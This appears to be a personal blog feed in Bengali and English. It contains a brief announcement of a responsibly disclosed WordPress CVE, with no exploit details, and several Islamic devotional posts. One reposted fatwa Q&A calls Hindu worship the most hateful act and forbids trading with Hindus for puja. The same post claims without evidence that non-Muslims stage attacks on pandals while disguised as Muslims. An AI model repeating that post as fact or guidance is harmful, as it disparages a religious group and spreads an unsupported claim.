উত্তরঃ আজকাল ফ্রি কমই থাকার সুযোগ হয়। তবে আপনার প্রয়োজন বিস্তারিত জানিয়েন ম্যাসেজ দিয়ে রাখুন। যখন আমি আপনার ম্যাসেজ দেখবো তখন বিস্তারিত উত্তর দেওয়ার চেষ্টা করবো ইনশাআল্লাহ।

ম্যাসেজঃ একটা বিষয়ে হেল্প লাগতো।+

উত্তরঃ জ্বি অবশ্যই। আপনার কি বিষয়ে হেল্প প্রয়োজন সেটা বিস্তারিত জানান। সমস্যাটি সমাধান করার জন্য কি কি স্টেপ নিয়েছেন, কেন ব্যর্থ হয়েছেন, ইত্যাদি বিস্তারিত বলুন। এরপর আমি কিভাবে আপনাকে হেল্প করতে পারি সেটা বুঝিয়ে বলুন। আমি যখন আপনার ম্যাসেজের উত্তর দেওয়ার সময় পাবো তখন বিস্তারিত জানানোর চেষ্টা করবো ইনশাআল্লাহ। আল্লাহ ﷻ যেন আমাদের জন্য সহজ করে দেন।

নোটঃ এই আর্টিকেলটি আপনি মজা হিসেবে নিতে পারেন, বা সিরিয়াসলি নিতে পারেন। পুরোটা আপনার উপর। তবে আপনিও যদি আমার মতো ভুক্তভোগী হয়ে থাকেন তাহলে আর্টিকেলটি কপি করে নিজের মতো ব্যবহার করতে পারেন।

কমিউনিকেশন বিষয়ে সুন্দর একটি আর্টিকেল লিখেছিলেন হাসান আব্দুল্লাহ ভাই, তার ব্যক্তিগত ব্লগে। সকলেরই পড়ে দেখা উচিত।

CVE-2025-58246: My Contribution to WordPress 6.8.3 Security

hello@hurayraiit.com (Abu Hurayra) — Thu, 02 Oct 2025 00:00:00 GMT

Alhamdulillah.

I’m pleased to share that my recent vulnerability report has been officially acknowledged in the WordPress 6.8.3 Security Release.
The issue, now tracked as CVE-2025-58246, addressed a Sensitive Data Exposure vulnerability discovered in WordPress Core version 6.8.2.

As part of my ongoing work as Lead Application Security Engineer at WPDeveloper, I identified and responsibly disclosed this vulnerability through the Patchstack Bug Bounty Program.

After review and validation by the WordPress Security Team, the issue was confirmed, triaged, and patched in the WordPress 6.8.3 release.

You can find the technical details in the official Patchstack Database Advisory and coverage in The Repository’s report.

I would like to thank both the WordPress Security Team and Patchstack for their professional handling of this report and their continuous commitment to improving WordPress security.

🔗 My WordPress.org profile: profiles.wordpress.org/hurayraiit

সন্তানকে তার উপযোগী কাজ দেওয়া আবশ্যক

hello@hurayraiit.com (Abu Hurayra) — Wed, 01 Oct 2025 00:00:00 GMT

সন্তানকে ফরজে আইন পরিমাণ ইলম শিক্ষা দিতে হবে। এ ক্ষেত্রে যদি অভিভাবক অবহেলা করে তাহলে তাকে জবাবদিহির সম্মুখীন হতে হবে। ফরজে আইন বিষয়গুলোর মধ্যে আছে তাহারাত, সালাত, সিয়াম, হজ্ব, মা-বাবার আনুগত্য ইত্যাদি। ছোট থেকেই সন্তানকে এসব বিষয় শেখাতে থাকলে বুঝ-বুদ্ধির পক্কতা আশার পর তার অন্তর ইলমের স্বাদ অনুভব করতে শিখবে।

অতপর সে যদি শরয়ী ইলম শিখতে আগ্রহী হয় তাহলে তাকে ইলম অর্জনের যাবতীয় উপায়-উপকরণের ব্যবস্থা করে দিতে হবে। সঠিক, বিজ্ঞ এবং দূরদর্শী একজন শিক্ষকের তত্ত্বাবধানে তাকে অর্পণ করতে হবে। শিক্ষক তার স্বভাব, বুঝ এবং ধারণক্ষমতা পর্যালোচনা করে তাকে নির্দেশনা দিতে থাকবে। একটা সময় পর সে একজন ভালো আলিম হয়ে উম্মতের উভজাগতিক কল্যান সাধনের কাজে নিয়োজিত হবে।

আর যদি তার আগ্রহ শরয়ী বিষয় ছাড়া অন্য কোনও বৈধ ব্যাপারে দেখা যায় তাহলে সে বিষয়ে অভিজ্ঞ কারো হাতে তাকে অর্পণ করতে হবে এবং সেই বিদ্যা অর্জনের সার্বিক উপায়-উপকরণ তাকে সরবরাহ করবে।

সে বিষয়ে যার আগ্রহ নেই এবং সে বিষয়ের ধারণক্ষমতাও তার মাঝে নেই, এ ক্ষেত্রে তাঁকে চাপাচাপি বা জোরাজুরি না করা উচিত।

বিধর্মীদের উৎসব সংক্রান্ত কিছু প্রশ্নোত্তর

hello@hurayraiit.com (Abu Hurayra) — Tue, 30 Sep 2025 00:00:00 GMT

প্রশ্ন-১: হিন্দুদের পূজায় মূর্তির উদ্দেশ্যে বলি দেয়ার জন্য কোন মুসলিম কি তাদের কাছে পাঠা বিক্রয় করতে পারবে?

উত্তর: সাধারণভাবে অমুসলিমদের নিকট বেচাকেনায় কোন দোষ নেই। তবে শর্ত হল, হারাম কোন কিছু বিক্রয় করা যাবে না। যেমন: মদ, শুকর বা শুকরের গোস্ত, হারাম প্রাণীর গোস্ত, বিধর্মীদের ধর্মীয় প্রতীক, বাদ্যযন্ত্র, তাদের পূজার সামগ্রী এবং এমন কোন বস্তু যা মূলত: বৈধ কিন্তু তারা তা হারাম কাজে ব্যবহার করবে।

ইমাম ইবনে তাইমিয়া রহঃ বলেন,

“মুসলিমদের জন্য কাফেরদের উৎসবের জন্য নির্দিষ্ট খাদ্য, পোশাক, গোসল..ইত্যাদি কোন কিছুর সাথে সাদৃশ্য অবলম্বন করা বৈধ নয়। অনুরূপভাবে তাদের উৎসবের কাজে লাগানো হয় এমন জিনিসও এ উদ্দেশ্যে বিক্রয় করাও বৈধ নয়।”

সুতরাং আপনি যখন জানবেন যে, তারা আপনার নিকট পাঠা ক্রয় করে তাদের দেবতার উদ্দেশ্যে বলি দিবে তখন তাদের নিকট তা বিক্রয় করা বৈধ নয়। কারণ ইসলামে গাইরুল্লাহ তথা আল্লাহ ছাড়া অন্য ব্যক্তি বা বস্তুর উদ্দেশ্যে পশু জবাই বা উৎসর্গ করা বড় শিরক। আর ইসলামের দৃষ্টিতে আসমানের নিচে ও জমিনের উপরে শিরকের চেয়ে ভয়াবহ ও বড় গুনাহ আর নেই।

আল্লাহ তায়ালা বলেন,

“নিঃসন্দেহে আল্লাহ তাকে ক্ষমা করেন না, যে তাঁর সাথে শরীক করে। আর যাকে ইচ্ছা এর নিম্ন পর্যায়ের পাপ ক্ষমা করেন।” (সূরা নিসা: ৪৮)

আল্লাহ তাআলা আরও বলেন,

“নিশ্চয় যে ব্যক্তি আল্লাহর সাথে শরিক (অংশীদার) স্থির করে, আল্লাহ তার জন্যে জান্নাত হারাম করে দেন। এবং তার বাসস্থান হয় জাহান্নাম। অত্যাচারীদের কোন সাহায্যকারী নেই।” (সূরা মায়িদা: ৭২)

রাসূলুল্লাহ্ সাল্লাল্লাহু আলাইহি ওয়াসাল্লাম বলেন:

“যে ব্যক্তি আল্লাহ ব্যতীত অন্য কারো নামে পশু জবেহ করে তার ওপর আল্লাহর অভিশাপ”। (সহিহ মুসলিম, হা/ ১৯৭৮)

সুতরাং দেব-দেবীর উদ্দেশ্যে বলি দেয়ার জন্য হিন্দুদের নিকট পাঠা বিক্রয় করা শিরকের কাজে সহায়তার শামিল-যা নি:সন্দেহে হারাম।

আল্লাহ তাআলা বলেন,

“আর সৎকর্ম ও আল্লাহ ভীতিতে একে অন্যের সহায়তা কর। পাপ ও সীমালঙ্ঘনের ব্যাপারে একে অন্যের সহায়তা করো না। আর আল্লাহকে ভয় কর। নিশ্চয় আল্লাহ তা’আলা কঠোর শাস্তি দাতা।” (সূরা মায়িদা: ২)

প্রশ্ন-২: হিন্দুদের পূজা উপলক্ষে ফার্নিচার, মাইক, সিসি ক্যামেরা, গাড়ি ইত্যাদি ভাড়া দেয়া জায়েজ আছে কি?

উত্তর: হিন্দুরা মহান সৃষ্টিকর্তা আল্লাহর সবচেয়ে ঘৃণিত কাজ করে। তা হল, মূর্তিপূজা। এটি হল, শিরক। শিরক এত ভয়ানক অপরাধ যাতে মহান আল্লাহ সবচেয়ে বেশি ক্রোধান্বিত হন এবং এই অপরাধ তিনি ক্ষমা করবেন না বলে দ্ব্যর্থ হীন ভাবে ঘোষণা করেছেন।

আল্লাহ তায়ালা বলেন:

“নিঃসন্দেহে আল্লাহ তাকে ক্ষমা করেন না, যে লোক তাঁর সাথে শরীক করে। তিনি ক্ষমা করেন এর নিম্ন পর্যায়ের পাপ, যার জন্য তিনি ইচ্ছা করেন।” (সূরা নিসা: ৪৮)

সুতরাং কোনও মুসলিমের জন্য জঘন্য শিরকের কাজে কোনও ভাবেই সহায়তা করা বৈধ নয়। অত:এব হিন্দুদের পূজা উপলক্ষে ফার্নিচার, মাইক, গাড়ি ইত্যাদি ভাড়াও দেয়া যাবে না।

মোটকথা, পূজার কাজে ব্যবহার করার জন্য কোনও বস্তু বা উপকরণ তাদের কাছে বিক্রয় করা বা ভাড়া দেয়া বৈধ নয়। কারণ তা শিরকের কাজে সহায়তার শামিল।

আল্লাহ বলেন,

“সৎকর্ম ও আল্লাহ ভীতিতে একে অন্যের সাহায্য কর। পাপ ও সীমালঙ্ঘনের ব্যাপারে একে অন্যের সহায়তা করো না।” (সূরা মায়িদা: ২)

আর এ কথায় কোনও সন্দেহ নাই যে, মূর্তিপূজা ও শিরক হল, সবচেয়ে বড় পাপ ও সীমালঙ্ঘন।

তবে সিসি ক্যামেরা ভাড়া দেয়া যেতে পারে। কারণ তা মুসলিম-হিন্দু সকলের নিরাপত্তার জন্য প্রয়োজন।

কেননা অনেক সময় কোনও স্বার্থান্বেষী অমুসলিমরা মুসলিম সেজে পূজা মণ্ডপে আক্রমণ চালিয়ে মুসলিমদের উপর তার দোষ চাপিয়ে দেয়। সিসি ক্যামেরা থাকলে হয়ত এমন চক্রান্ত বাস্তবায়ন করা সম্ভব হবে না। সুতরাং বৃহত্তর স্বার্থে এতে কোনও সমস্যা নাই ইনশাআল্লাহ।

সৌদি আরবের সাবেক গ্রান্ড মুফতি বিশ্ববরণ্যে আলেম আল্লামা আব্দুল্লাহ বিন বায রাহ. বলেন,

“কোনও মুসলিম পুরুষ-নারীর জন্য ইহুদি-খ্রিস্টান বা অন্যান্য কাফেরদের উৎসবে অংশগ্রহণ করা ও সহযোগিতা করা জায়েজ নয় বরং তা বর্জন করা আবশ্যক। কারণ “যে ব্যক্তি অন্য কোনও জাতির সাদৃশ্য অবলম্বন করবে সে তাদের দলভুক্ত হিসেবে গণ্য হবে।” রাসূল সাল্লাল্লাহু আলাইহি ওয়া সাল্লাম আমাদেরকে তাদের সাদৃশ্য অবলম্বন ও চরিত্র গ্রহণ করার ব্যাপারে সতর্ক করেছেন।

সুতরাং ইমানদার নারী-পুরুষের জন্য এ বিষয়ে সাবধান হওয়া জরুরি। এ উৎসব পালনে তাদেরকে কোনভাবেই সাহায্য করা বৈধ নয়। কেননা এগুলো শরিয়ত বিরোধী উৎসব। সুতরাং তাতে অংশগ্রহণ করা জায়েজ নেই এবং তাদেরকে সাহায্য-সহযোগিতা করা বৈধ নয়। চা, কফি, হাড়ি-পাতিল ইত্যাদি দ্বারাও সহায়তা করা যাবে না।

আল্লাহ তা’আলা বলেন,

“আর তোমরা সৎকর্ম ও আল্লাহ ভীতিতে একে অন্যের সহায়তা কর। পাপ ও সীমালঙ্ঘনের ব্যাপারে একে অন্যের সহায়তা করো না।” (সূরা মায়িদা: ২)

আর কাফেরদের সাথে তাদের উৎসবে অংশগ্রহণ করা তাদেরকে গুনাহ এবং সীমালঙ্ঘনের কাজে সহায়তার শামিল।” [ফতোয়া বিন বায ৬/৪০৫]

◈◈ মিলিনিয়াম (সহস্রাব্দ) পালন উৎসবে অংশ গ্রহণ প্রসঙ্গে সৌদি আরবের স্থায়ী ফতোয়া কমিটির আলেমগণ বলেন,

“কোনও মুসলিমের জন্য কাফেরদেরকে তাদের উৎসবে কোনোভাবে সাহায্য-সহযোগিতা করা শরিয়ত সম্মত নয়। যার মধ্যে রয়েছে: উল্লিখিত মিলিনিয়াম (সহস্রাব্দ) উদযাপন, তাদের উৎসবগুলোর প্রচার-প্রসার করা বা সেগুলো ঘোষণা করা বা এগুলোর প্রতি কোনও উপায়ে আহ্বান জানানো-চাই তা মিডিয়ার মাধ্যমে হোক অথবা ডিজিটাল ঘড়ি ও বিলবোর্ড স্থাপনের মাধ্যম হোক অথবা এ উপলক্ষে বিশেষ পোশাক তৈরি, স্মৃতিসৌধ নির্মাণ, স্কুলের খাতা ছাপানো, কার্ড বানানো, এ উপলক্ষে বাণিজ্যিক ছাড় ও আর্থিক পুরস্কার ঘোষণা অথবা ক্রীড়া কার্যক্রম বা তাদের নিজস্ব লোগো প্রকাশ ইত্যাদি যেভাবেই হোক না কেনো।” (ফতোয়া লাজনা দায়েমাহ)

অবশ্য কোথাও পরিস্থিতি যদি এমন হয় যে, কাফেরদের পূজা বা উৎসব পালনে সাহায্য না করলে তারা মুসলিমদের জান-মালের ক্ষতি করবে বা তাদের প্রতি জুলুম-নির্যাতন করবে তাহলে তাদের ক্ষতির হাত থেকে আত্মরক্ষার স্বার্থে যদি সহযোগিতা করতে বাধ্য হয় তাহলে ইনশাআল্লাহ দয়াময় আল্লাহ গুনাহ লিখবেন না।

রাসূল সাল্লাল্লাহু আলাইহি ওয়া সাল্লাম বলেন,

“আমার উদ্দেশ্যে আল্লাহ‌ আমার উম্মতের অনিচ্ছাকৃত ভুল-ত্রুটি ও জোরপূর্বক কৃত অন্যায় ক্ষমা করে দিয়েছেন।” (ইবনে মাজাহ, হা/২০৪৫, বায়হাকি-সুনানুল কুবরা, হা/৭। হাদিসটি হাসান)

প্রশ্ন-৩: কোনও অমুসলিম পূজার জন্য ফুল চাইলে তাকে তা দিলে কি গুনাহ হবে? আর যদি সে না বলে নিয়ে যায় সেক্ষেত্রে কী হবে?

উত্তর: যদি আপনি জানতে পারেন যে, কোন হিন্দু মূর্তি পূজার জন্য ফুল ব্যবহার করবে বা পূজা মণ্ডপে ফুলের অর্ঘ প্রদান করবে তাহলে তাদেরকে ফুল দেয়া বা তাদের কাছে তা বিক্রয় করা জায়েজ নয়।

কেননা হিন্দুরা মূর্তি পূজার মাধ্যমে এ বিশ্বচরাচরের মহান সৃষ্টিকর্তা আল্লাহর সাথে শিরক (অংশী স্থাপন) করে। আর শিরক আল্লাহর নিকট সবচেয়ে বড় অপরাধ।

সুতরাং আপনার ফুল দ্বারা যদি তারা এত বড় অপরাধ করে তাহলে প্রকারান্তরে আপনি তাদেরকে এতে সহায়তা করলেন। অথচ আল্লাহর নাফরমানির ব্যাপারে কাউকে সাহায্য করা ইসলামে নিষিদ্ধ।

তবে না দিলে তারা যদি আপনার ক্ষয়-ক্ষতি করবে বলে আশঙ্কা থাকে তাহলে আত্মরক্ষার স্বার্থে দিলে গুনাহ হবে না ইনশাআল্লাহ।

আর তারা যদি অজান্তে আপনার বাগান থেকে ফুল তুলে নিয়ে যায় তাহলে এতে আপনার কোন গুনাহ নাই কারণ। তা আপনার ইচ্ছার বাইরে ঘটেছে।

আল্লাহু আলাম।

উত্তর প্রদানে:আব্দুল্লাহিল হাদী বিন আব্দুল জলীল মাদানী।দাঈ, জুবাইল দাওয়াহ এন্ড গাইডেন্স সেন্টার, সৌদি আরব।

[Source]

দাওয়াত, দুআ ও কাচ্চি

hello@hurayraiit.com (Abu Hurayra) — Mon, 29 Sep 2025 00:00:00 GMT

নিচের পোস্টটি লিখেছেন শিবলী মেহদি ভাইয়া, তার ফেসবুক প্রোফাইলে।

দাওয়াতে মজার খাবারের উদাহরণ দেই। যার যার পরিস্থিতি ভিন্ন হতে পারে, খাবার ছাড়া ভিন্ন কিছুও হতে পারে। কিন্তু এমন পরিস্থিতিতে সমাধান একটাই।

দাওয়াতে কাচ্চি খেতে বসে দেখলেন খুবি মজার কাচ্চি, আলহামদুলিল্লাহ! এতো মজার যে, আপনার খুব ইচ্ছা হচ্ছে মজা করে খাওয়া শেষে কিছু কাচ্চি বাসায় নিয়ে যেতে যেনো আরেক বেলা মজা করে খেতে পারেন। কিন্তু আপনি হোস্টকে যদি বলেন, ❝সকলের খাওয়া শেষে যদি অতিরিক্ত কাচ্চি থাকে প্লিজ কিছুটা দিও, বাসায় গিয়ে আবার খাবো!❞

হোস্ট অবশ্যই এটা করতে চাইবে এবং তখন সম্ভাবনা আছে:

১/ হোস্টের নিজের বাসার সকলে কম করে খেয়ে হলেও মেহমানের ইচ্ছা পূরণ করবে। (কিন্তু মেহমান সেটা বুঝতে পারলে তারও খুব খারাপ লাগবে, লজ্জা লাগবে।)

২/ হোস্টের বাসার সকলে কম করে খেয়েও যদি দেয়ার মতো অতিরিক্ত কাচ্চি না থাকে তখন হোস্টের খুব খারাপ লাগবে যে, চেষ্টা করেও মেহমানের ইচ্ছা পূরণ করা গেলই না।

কিন্তু আপনি যদি হোস্টকে আপনার ইচ্ছাটাই না জানান, তাহলেও হতে পারে যে, অতিরিক্ত কাচ্চি থাকার পরেও হোস্ট নিজে থেকে কিছুই দিলেন না।

এমন পরিস্থিতিতে একটাই সমাধান। আল্লাহর কাছে দু'য়া করা, আল্লাহর কাছে চাওয়া। এতে কী কী হতে পারে?

১/ আল্লাহ যদি কবুল করেন তাহলে তিনি ঐ কাচ্চিতে বারাকাহ বাড়িয়ে দেবেন এবং কেউ কম খাবে না বরং সবাই মজা করে খাবে কিন্তু তারপরেও অতিরিক্ত কাচ্চি থাকবে।

২/ তারপর তিনি হোস্টের অন্তরে ইচ্ছা দিয়ে দেবেন যেনো তিনি গেস্টকে পর্যাপ্ত খাবার দিয়ে দেন।

৩/ এমন কি তিনি খাবারে এতোটাই বারাকাহ বাড়াবেন যে, যিনি এই দাওয়াতের কথা বা কাচ্চির কথা জানতেনই না এমন কারো কারো কাছেও ঐ কাচ্চি পৌঁছে দেয়ার চিন্তা ভাবনা হোস্টের অন্তরে আল্লাহ দিয়ে দেবেন।

এটা গেল আল্লাহ যদি কবুল করেন। কিন্তু যদি তিনি কবুল নাও করেন তাহলেও লাভ আছে।

১/ কিন্তু আল্লাহ যদি কবুল নাও করেন, তাহলেও একজন মুমিনের লস নাই। কারণ, শুধুমাত্র তাঁর কাছে দুয়া করার কারণে শেষ বিচার দিবসে তিনি এর বিনিময়ে অনেক অনেক সোয়াব দেবেন।

২/ কিংবা ঐ খাবারের চাইতে আরো উত্তম খাবার খাওয়াবেন।

৩/ কিংবা কোনো বিপদ হতে রক্ষা করবেন।

অর্থাৎ শুধুমাত্র তাঁর কাছে বৈধ জিনিষ চাওয়ার কারণে তিনি উত্তম কিছু না কিছু অবশ্যই দেবেন। কারণ দু'য়া করাটাই একটা ইবাদাত।

প্রয়োজন ছোট কিংবা বড় হোক, মানুষের কাছে চাইতে লজ্জা লাগলেও আল্লাহর কাছে চাইতে লজ্জা পাওয়া যাবে না। দু'য়া শুধু রবের কাছেই। তিনি চান যেনো আমরা তাঁর কাছেই চাই। কারণ তিনিই একমাত্র দেয়ার মালিক।

তুমি কি এমন সময় ঘুমাচ্ছ যখন রিজিক বণ্টন করা হচ্ছে?

hello@hurayraiit.com (Abu Hurayra) — Mon, 29 Sep 2025 00:00:00 GMT

আনাস বিন মালিক رضي الله عنه বলেন, রাসূল ﷺ বলেছেন :

"যে ফজরের সালাত জামাআতে আদায় করে অতপর বসে সূর্য ওঠা পর্যন্ত আল্লাহ তাআলার জিকির করতে থাকে, এরপর দুই রাকাত সালাত পড়ে, তার জন্য একটি হজ্ব ও উমরার সাওয়াব লেখা হবে।" ( মাজমাউয যাওয়ায়েদ : ১০/১০৪ )

জাবির বিন সামুরাহ رضي الله عنه বলেন, রাসূল ﷺ যখন ফজরের সালাত পড়তেন তখন সেখানেই সূর্য ওঠা পর্যন্ত সালাতের সুরতে চারজানু হয়ে বসে থাকতেন। ( সহিহ মুসলিম : ১/৪৬৪ )

জাবির বিন আবদুল্লাহ رضي الله عنه বলেন, রাসূল ﷺ বলেছেন :

"হে আল্লাহ, আপনি আমার উম্মতের প্রত্যুষে বরকত দান করুন।"

সুতরাং সকাল সকাল ওঠা এবং সকালে না ঘুমানোর দ্বারা রিজিকে বরকত আসে। ইবনু আব্বাস রাদিআল্লাহু আনহুমা তাঁর এক ছেলেকে সকালে ঘুমাতে দেখে বললেন, 'উঠে পড়ো! তুমি কি এমন সময় ঘুমাচ্ছ যখন রিজিক বণ্টন করা হচ্ছে!'

[Reference] নববি তরবিয়ত - শাইখ জামাল আবদুর রহমান - চতুর্থ পরিচ্ছেদ

শিশুর মৃত্যুতে রাসুলুল্লাহ (সা:) কাঁদতেন এবং শিশুর পরিবারকে সমবেদনা জানাতেন

hello@hurayraiit.com (Abu Hurayra) — Thu, 25 Sep 2025 00:00:00 GMT

উসামা বিন যায়েদ রাদিআল্লাহু আনহু বলেন, রাসূল সাল্লাল্লাহু আলাইহি ওয়া সালামের এক মেয়ে তাঁর কাছে সংবাদ পাঠালেন যে, "আমার ছেলে মরার উপক্রম। আপনি আমাদের কাছে আসুন।" রাসূল তাকে সালাম পাঠালেন এবং সাথে বলে পাঠালেন :

"নিশ্চয় আল্লাহ তাআলার জন্যই উৎসর্গিত তিনি যা নিয়েছেন এবং যা দিয়েছেন। আর তাঁর কাছে সব কিছুরই নির্ধারিত মেয়াদ আছে। সুতরাং তুমি ধৈর্য ধরো এবং সাওয়াবের আশা রাখো।"

অতপর মেয়েটি কসম দিয়ে বলে পাঠালেন যেন অবশ্যই তিনি আসেন। রাসূল উঠে দাঁড়ালেন। সাথে ছিলেন সাদ বিন উবাদাহ এবং অন্যান্য সাহাবি। বাচ্চাটিকে রাসূলের কাছে তুলে ধরা হলো। পুরনো পানির মশকে পানি ফোটার মতো বাচ্চাটির গড়গড়া শুরু হয়ে গিয়েছিল। রাসূলের গাল বেয়ে অশ্রু গড়িয়ে পড়ল। সাদ রাদিআল্লাহু আনহু বললেন, হে আল্লাহর রাসূল, এটা কি (আপনার চোখেও পানি দেখতে পাচ্ছি যে)! রাসূল বললেন:

"এটা হলো দয়া। যেটা আল্লাহ তাঁর বান্দাদের হৃদয়ে ঢেলে দিয়েছেন। আর আল্লাহ তাঁর দয়াশীল বান্দাদের ভালোবাসেন।"